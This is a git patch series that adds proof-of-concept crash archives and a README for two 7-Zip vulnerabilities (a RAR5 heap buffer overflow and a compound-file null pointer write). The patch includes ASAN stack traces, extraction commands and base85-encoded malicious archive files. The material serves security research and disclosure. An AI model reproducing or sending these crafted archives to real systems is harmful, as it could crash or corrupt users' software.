From d0bf0ac880b54fca5d63e311761ccc232d2793cf Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= <jarlob@gmail.com>
Date: Fri, 24 Oct 2025 19:22:53 +0000
Subject: [PATCH 1/2] 7-zip PoCs

---
 SecurityExploits/7-Zip/README.md          |  36 ++++++++++++++++++++++
 SecurityExploits/7-Zip/compound-crash.poc | Bin 0 -> 24663 bytes
 SecurityExploits/7-Zip/rar-crash.rar5     | Bin 0 -> 55269 bytes
 3 files changed, 36 insertions(+)
 create mode 100644 SecurityExploits/7-Zip/README.md
 create mode 100644 SecurityExploits/7-Zip/compound-crash.poc
 create mode 100644 SecurityExploits/7-Zip/rar-crash.rar5

diff --git a/SecurityExploits/7-Zip/README.md b/SecurityExploits/7-Zip/README.md
new file mode 100644
index 0000000..7456d00
--- /dev/null
+++ b/SecurityExploits/7-Zip/README.md
@@ -0,0 +1,36 @@
+# The directory contains proof of concept for GHSL-2025-058 (CVE-2025-53816) and GHSL-2025-059 (CVE-2025-53817) advisories.
+
+## GHSL-2025-058 (CVE-2025-53816)
+
+The `rar-crash.rar5` triggers heap buffer write overflow when 7zz 24.09 is compiled with ASAN and extracted, for example as `7zz e -so rar-crash.rar5`. On Windows the same PoC was tested to crash 7-Zip 24.09 even without ASAN. [The advisory](https://securitylab.github.com/advisories/GHSL-2025-058_7-Zip/).
+
+```
+==2188082==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc75fbcc844 at pc 0x5567af835070 bp 0x7fff7f71ce30 sp 0x7fff7f71c600
+WRITE of size 9469 at 0x7fc75fbcc844 thread T0
+    #0 0x5567af83506f in __asan_memset /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:67:3
+    #1 0x5567b0167b0c in My_ZeroMemory(void*, unsigned long) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Compress/Rar5Decoder.cpp:63:5
+    #2 0x5567b017c257 in NCompress::NRar5::CDecoder::Code(ISequentialInStream*, ISequentialOutStream*, unsigned long const*, unsigned long const*, ICompressProgressInfo*) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Compress/Rar5Decoder.cpp:1905:11
+    #3 0x5567aff075c0 in NArchive::NRar5::CUnpacker::Code(NArchive::NRar5::CItem const&, NArchive::NRar5::CItem const&, unsigned long, ISequentialInStream*, ISequentialOutStream*, ICompressProgressInfo*, bool&) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Archive/Rar/Rar5Handler.cpp:1165:24
+    #4 0x5567aff24721 in NArchive::NRar5::CHandler::Extract(unsigned int const*, unsigned int, int, IArchiveExtractCallback*) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Archive/Rar/Rar5Handler.cpp:3293:25
+    #5 0x5567b0244c0b in DecompressArchive(CCodecs*, CArchiveLink const&, unsigned long, NWildcard::CCensorNode const&, CExtractOptions const&, bool, IExtractCallbackUI*, IFolderArchiveExtractCallback*, CArchiveExtractCallback*, UString&, unsigned long&) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Common/Extract.cpp:235:23
+    #6 0x5567b023fe41 in Extract(CCodecs*, CObjectVector<COpenType> const&, CRecordVector<int> const&, CObjectVector<UString>&, CObjectVector<UString>&, NWildcard::CCensorNode const&, CExtractOptions const&, IOpenCallbackUI*, IExtractCallbackUI*, IFolderArchiveExtractCallback*, IHashCalc*, UString&, CDecompressStat&) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Common/Extract.cpp:542:5
+    #7 0x5567b02f9d8a in Main2(int, char**) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Console/Main.cpp:1378:21
+    #8 0x5567b0305b34 in main /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Console/MainAr.cpp:162:11
+```
+
+## GHSL-2025-059 (CVE-2025-53817)
+
+The `compound-crash.poc` triggers null pointer write dereference when 7zz is compiled with ASAN and extracted, for example as `7zz e -so compound-crash.poc`. On Windows the same PoC was tested to crash 7-Zip 24.09 even without ASAN. [The advisory](https://securitylab.github.com/advisories/GHSL-2025-059_7-Zip/).
+
+```
+==2387581==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5615317c0993 bp 0x7ffcb31a1350 sp 0x7ffcb31a1300 T0)
+==2387581==The signal is caused by a WRITE memory access.
+==2387581==Hint: address points to the zero page.
+    #0 0x5615317c0993 in CRecordVector<unsigned int>::AddInReserved(unsigned int) ../../Archive/../../Common/MyVector.h:249:18
+    #1 0x5615317bfe66 in NArchive::NCom::CHandler::GetStream(unsigned int, ISequentialInStream**) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Archive/ComHandler.cpp:866:28
+    #2 0x5615317bea3d in NArchive::NCom::CHandler::Extract(unsigned int const*, unsigned int, int, IArchiveExtractCallback*) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Archive/ComHandler.cpp:806:20
+    #3 0x561531e94bbb in DecompressArchive(CCodecs*, CArchiveLink const&, unsigned long, NWildcard::CCensorNode const&, CExtractOptions const&, bool, IExtractCallbackUI*, IFolderArchiveExtractCallback*, CArchiveExtractCallback*, UString&, unsigned long&) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Common/Extract.cpp:235:23
+    #4 0x561531e8fdf1 in Extract(CCodecs*, CObjectVector<COpenType> const&, CRecordVector<int> const&, CObjectVector<UString>&, CObjectVector<UString>&, NWildcard::CCensorNode const&, CExtractOptions const&, IOpenCallbackUI*, IExtractCallbackUI*, IFolderArchiveExtractCallback*, IHashCalc*, UString&, CDecompressStat&) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Common/Extract.cpp:542:5
+    #5 0x561531f49d3a in Main2(int, char**) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Console/Main.cpp:1378:21
+    #6 0x561531f55ae4 in main /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Console/MainAr.cpp:162:11
+```
\ No newline at end of file
diff --git a/SecurityExploits/7-Zip/compound-crash.poc b/SecurityExploits/7-Zip/compound-crash.poc
new file mode 100644
index 0000000000000000000000000000000000000000..d49fa6c5fc97270f048853b8af7f95ada677638f
GIT binary patch
literal 24663
zcmeI4&rcIU6vt<g3MvOQ1PP*9HG#&15MzXdg#OyCYhsK6FCL98Py;P#iiQ&=diQVe
zVB*2Vl(UJRJt!VLt4WWXI4FkL`d;@(YXfw)Y)iL(r`et9%$xV#d}f=@PTzL(^Xcy|
z^TR(xO_~wiqFCw^$E|vWa{DM(^$XEu)fG#nk|idnh~y&z_Piknfes~bvO~v(VS#`r
z1QgX1HBi!20@k9U*i<7>4gw$m0wD085cor1E8R3!zK6GSAKkvf)%pZ})fa&T2!H?x
zfIx>4=)s13hs~&$!&&!I8FYaF2!H?x_=&)*$j~b%RH2JB<yo=jYUg861e_%X?;kwx
z?<@EJU}}k*nR!;fyn8nM>Z@{$-iFVbbpbIaR>d;C9+Yk0A}{92qine*CsI^SS1YM0
z2Pq1nns-g}zHe`H@B*c<Q3@4eTakkPM!RO1b#Bi64cO-&BzqYarLgfaG7-y9Pe(`N
zlhKjr_4uMT8a3Nw&O@S0=^;Um(_juVea?~4ge7R%51k1G^{Hq+5_HL6Kqx!Cq>Ja2
zbD1<kLPM4y+yAY9iocHR=)nejpz*t&|MO(~3gKcG!p5xjQ!m8cHaG*r#6LiKI5tL>
z{{@o0LkB0veuFbGxT`2`uYZ;7vJafX#(jNTThu3Sn(y77`)K?psM9GrWXFGzWGnN(
z9!f;Uqc>b$cebBwpRYZefn9%4eyK`6Y=ow_V^dmQKd8t4ZDilEEj#|pq|V?Ah7#Ei
zJ<+$cM>8ARxI6=Uxb<?=2+oHguzQ%!=-Uzksg_uQ5fJbR0c&~b6K~-r2!H?xFacg2
zBY^-2ctC)|dpNWQ;XU>4l+g|XAOHeh5P0u}694GneSiOW>tj#HeC#`12LXq`H>ZRG
z2!H?xfIw3SAiSp%-ZLTp^SZP1(hlK0yu5C1c+Un$u<V%zD7=F0n;{mPhxoG?j(6Y#
ze-_h}4|+?K?s<uz5(Gd11lo_lSo^sIk3awfKmY_9C15?b(P;NJ>KADvU*HM|)F*&w
zl9t?N!-zD2U1>=Of&d6~9szoKZprP_bIvy%ZSO1myfQB;8I9AhPvJ#vs*>Yva!*oa
zj_ijtJy9#Iq+-855NW0If=6urpGYQoua8plDH~6yxr~}yOsbDFORLMtt8<yv?8D^U
eY-S~y&8^*|h83%<CX(~1bSk}27GKIV!}Y(;k554W

literal 0
HcmV?d00001

diff --git a/SecurityExploits/7-Zip/rar-crash.rar5 b/SecurityExploits/7-Zip/rar-crash.rar5
new file mode 100644
index 0000000000000000000000000000000000000000..a7cee57204aa078d042d69cfb12962efa07cbad9
GIT binary patch
literal 55269
zcmeHQ&r6h16n*pcOTpR%C52EDE&8D*xd<W@3quNOf;Qoz#R!6k<hO7+ph1CPTXEGU
zTD1w>7{n|z+zCPXN7SZOgh=yd#_9TfHjek+nR)MVHs+@5oBPf^_uTv5eY1V`VfOip
zizhPXg8lbg@t3u`zaO8>9BUtI%N)t)&05}Uk9`~Jj-q9Ad|`BDF4{C1Gq{+aDrCAk
z;@nK!Gd`J{h-c&V`Odzm_hawYli}4Xh5qT1wT;45&X^CA_Xa8!Ov!>d&_Z<yS4(TS
zeQW3Go;4h7LB0l_g>2S(qUgzu_O(;hk8zk!QMO=a<Ki#8HPF4NF2Pezmi)l<B=rM4
z2~6tZfrls(-9WV{U({gQ*WKq|*2ou^D>;ko1(Rvz7APjc)zA+$P+g}AYA7auK6{fX
zN7k#d8gyNWK|fH2k>o6~ei(qJC9#R@->B^0dY&{#>s*68HeIj)RBQD>(%Jw1ZXc#j
zM3KFKrd41V=m$B&q)}b%E;bF-^i!zUS$D244Oi;T8XeA?bPYTuCbvNN!8rx;C2#7)
zgWL~t3ofDhMzQNIN44BSYf&w(Q2N}dP<-DD<jt@c#-8iBfJqnDz+*X=@`WqADe)v2
z1`MNBcgsDQu<+>c_a9tV=EZv;VJLH)46^U!fUC7mCncT?sm9^?A;Gkan`U5It-J|M
ztLsT<TCL~?Ps%+hw*aQq<p+vtoD4!glocs@V(#?q6PU!wAiLfKsx?rJlR>LuXx{Yw
z?t$-dff`3kSBHe^MBZe~4Du|XLTOxu;ycsw5G9Xpxdrs)bWx3*1x#uoO3RbLq?RWg
z)lrxtIppkv91qlj?{yYMHG0LZ(sHOTwDM-~nijocm0mHXNG$VnUS2}4*yewlH+}D5
z_^x44<4{G)(=fs3O-8TS_qYg&qj;#+iVHA|mM4KpxhE4AFh!DnO|&I*C?Vww^n#Fa
zaBq<G<(Ti}P_9<z2lRqi9gO5$GkQVj1@YKEysBB9qZoC!WG_&u(TpSUBq}xPN#ElF
zyGeIb5*J_?El&cIa!)2Kpcj<x1vOcL?2Br=D8jDPz}0wBgtDCPN(}me?xrNV_hs5T
zJO7S%_L`itfJtCd>jtLWlX43rx}AH!+V@xTa5BitSwOWr3=>}8K7mP`46^G@-|GuE
zR55OeTfTQ=FOuioJO$!=T%g9$QXnCrI*~U~cYFE`;J~Cjy5$yv*VW($@B`y5aT;0B
zQCjC&zI)QqoP`%f@S;eepTTnJ?2leC>I+Pfkkcqkkp%l~%a|gudIm3waKF>dQ8mc=
zPB-6`IeNvkV&!R=v>NpNogAJYs3*B`VQrK!Dbx=*m9w4%(^5>zQO&bJR59*oDX8L*
zP|ZUWMKzacJNqKhUeGo0J_Yio);%#WjIJl0Wtev()8D(JXxSWpKe{p(Z5m?+7xPnv
zOjk#on~8hIwfrED?t}%*>tS9`N!#n(^5W&J1ghC*2dKNXJn1Y~*Eydh_k-L5^n+I3
zgr?Q?BzRIQy1|ojPs%NTX?6L5q8fKFplNXjgD{Nn45cA;7UuO>HwPNB7frt7O}V;t
zC!{zTv?|7pz0g6m?<XLrakO-GNT`OED`~l*Ups%=$85U5JPxDVOe4!*o}{0G7Z>Qu
z>DJxIS-_+gqO?2-Olo=3Q5}VOJ<RK2UawcDYUb%EErtPCYkAU9u4YZsBru6yu}ZHP
z^LjQ$Ft3Msz2Q}Vdm!Xo4^t$f$p!R+(v`dKaS^ZzYVs*9lsS}nnjaF%ylI$B>;<Ms
z(o-ZYxn~|yzQDb~Rz-L4ns(&#*RArr-h#37dQqe1^@7*5=moJl7!&bqY;$P&=YJ-?
zPq#hz^be)`4V2ah)Jsc0-d6rIb0l@|pRa4Ebx-<<v+MIE)w+A%^;*X4PQsFfTQ`_9
Fe*wr7-BADl

literal 0
HcmV?d00001


From c1ac48d0f7677ad1f2916fdb85820a231d2433a6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= <jarlob@gmail.com>
Date: Fri, 24 Oct 2025 21:24:17 +0200
Subject: [PATCH 2/2] Update SecurityExploits/7-Zip/README.md

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
---
 SecurityExploits/7-Zip/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/SecurityExploits/7-Zip/README.md b/SecurityExploits/7-Zip/README.md
index 7456d00..915716c 100644
--- a/SecurityExploits/7-Zip/README.md
+++ b/SecurityExploits/7-Zip/README.md
@@ -1,4 +1,4 @@
-# The directory contains proof of concept for GHSL-2025-058 (CVE-2025-53816) and GHSL-2025-059 (CVE-2025-53817) advisories.
+# This directory contains proof of concept for GHSL-2025-058 (CVE-2025-53816) and GHSL-2025-059 (CVE-2025-53817) advisories.
 
 ## GHSL-2025-058 (CVE-2025-53816)